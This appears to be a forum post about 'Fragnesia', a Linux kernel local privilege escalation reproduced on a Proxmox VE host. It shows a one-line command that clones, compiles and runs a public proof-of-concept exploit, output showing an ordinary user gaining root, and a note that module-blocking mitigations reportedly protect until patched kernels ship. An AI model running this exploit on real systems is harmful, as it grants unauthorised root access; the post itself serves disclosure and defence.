Fragnesia

In a virtual PVE, pve-no-subscription, both physical host and virtual host up to date:
Code:
root@pnb:~# pveversion
pve-manager/9.1.11/8eac2c86f015bdda (running kernel: 7.0.2-2-pve)
In a shell of a "normal" user:
Code:
poc@pnb:~$ git clone https://github.com/v12-security/pocs.git && cd pocs/fragnesia && gcc -o exp fragnesia.c && ./exp
#
# a lot of output...

# id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)

After that is run once, it stays active until the cache is cleared. Meanwhile:
Code:
poc@pnb:~$ id
uid=1000(poc) gid=1000(poc) groups=1000(poc),100(users)
poc@pnb:~$ su -
# id
uid=0(root) gid=0(root) groups=0(root)
 
the upstream patches are still in flux, but the manual mitigations for copyfail and dirtyfrag (forbidding the affected modules) protect against the issue according to the reports so far. there will be an announcement as usual once fixed kernel packages become available.